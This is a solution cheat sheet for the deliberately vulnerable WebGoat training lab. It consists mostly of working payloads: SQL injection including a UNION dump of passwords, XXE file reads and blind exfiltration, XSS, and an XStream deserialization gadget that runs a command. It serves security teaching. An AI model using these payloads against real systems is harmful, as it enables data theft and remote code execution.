115 lines
2.9 KiB
Markdown
115 lines
2.9 KiB
Markdown
https://github.com/WebGoat/WebGoat/wiki/(Almost)-Fully-Documented-Solution-(en)
|
|
|
|
|
|
### SQLi ###
|
|
|
|
Basic
|
|
Smith - to show it returns smith's records.
|
|
To show exploit; `1=1` can be any true clause:
|
|
|
|
```sql
|
|
Smith' or '1'='1
|
|
```
|
|
|
|
**Bender Login**
|
|
```sql
|
|
bender@juice-sh.op' --
|
|
```
|
|
```sql
|
|
[2:19 PM]
|
|
101
|
|
101 or 1=1
|
|
```
|
|
```sql
|
|
Smith' union select userid,user_name, password,cookie,cookie, cookie,userid from user_system_data --
|
|
```
|
|
|
|
## XXE ##
|
|
|
|
Simple:
|
|
```xml
|
|
<?xml version="1.0" standalone="yes" ?><!DOCTYPE user [<!ENTITY root SYSTEM "file:///"> ]><comment><text>&root;</text></comment>
|
|
```
|
|
|
|
Modern Rest Framework:
|
|
Change content type to: `Content-Type: application/xml` and
|
|
```xml
|
|
<?xml version="1.0" standalone="yes" ?><!DOCTYPE user [<!ENTITY root SYSTEM "file:///"> ]><user> <username>&root;</username><password>test</password></user>
|
|
```
|
|
|
|
Blind SendFile
|
|
```xml
|
|
|
|
Solution:
|
|
|
|
Create DTD:
|
|
|
|
<pre>
|
|
<?xml version="1.0" encoding="UTF-8"?>
|
|
<!ENTITY % file SYSTEM "file:///c:/windows-version.txt">
|
|
<!ENTITY % all "<!ENTITY send SYSTEM 'http://localhost:8080/WebGoat/XXE/ping?text=%file;'>">
|
|
%all;
|
|
</pre>
|
|
|
|
This will be reduced to:
|
|
|
|
<pre>
|
|
<!ENTITY send SYSTEM 'http://localhost:8080/WebGoat/XXE/ping?text=[contents_file]'>
|
|
</pre>
|
|
|
|
Wire it all up in the xml send to the server:
|
|
|
|
<pre>
|
|
<?xml version="1.0"?>
|
|
<!DOCTYPE root [
|
|
<!ENTITY % remote SYSTEM "http://localhost:8080/WebGoat/plugin_lessons/XXE/test.dtd">
|
|
%remote;
|
|
]>
|
|
<user>
|
|
<username>test&send;</username>
|
|
</user>
|
|
|
|
</pre>
|
|
|
|
|
|
```
|
|
|
|
### XSS ###
|
|
```javascript
|
|
<script>alert('my javascript here')</script>4128 3214 0002 1999
|
|
```
|
|
|
|
DOM-XSS:
|
|
|
|
Something like
|
|
`http://localhost:8080/WebGoat/start.mvc#test/testParam=foobar&_someVar=234902384lotslsfjdOf9889080GarbageHere%3Cscript%3Ewebgoat.customjs.phoneHome();%3C%2Fscript%3E
|
|
//`
|
|
OR
|
|
`http://localhost:8080/WebGoat/start.mvc#test/testParam=foobar&_someVar=234902384lotslsfjdOf9889080GarbageHere<script>webgoat.customjs.phoneHome();<%2Fscript>`
|
|
|
|
### Vuln - Components ###
|
|
|
|
Jquery page: - it is contrived; but paste that in each box
|
|
```javascript
|
|
OK<script>alert("XSS")<\/script>
|
|
OK<script>alert("XSS")<\/script>
|
|
```
|
|
for the deserialization: got to the link: http://www.pwntester.com/blog/2013/12/23/rce-via-xstream-object-deserialization38/ to read about why it works so you can talk to it.
|
|
```html
|
|
<sorted-set>
|
|
<string>foo</string>
|
|
<dynamic-proxy>
|
|
<interface>java.lang.Comparable</interface>
|
|
<handler class="java.beans.EventHandler">
|
|
<target class="java.lang.ProcessBuilder">
|
|
<command>
|
|
<string>/Applications/Calculator.app/Contents/MacOS/Calculator</string>
|
|
</command>
|
|
</target>
|
|
<action>start</action>
|
|
</handler>
|
|
</dynamic-proxy>
|
|
</sorted-set>
|
|
|
|
```
|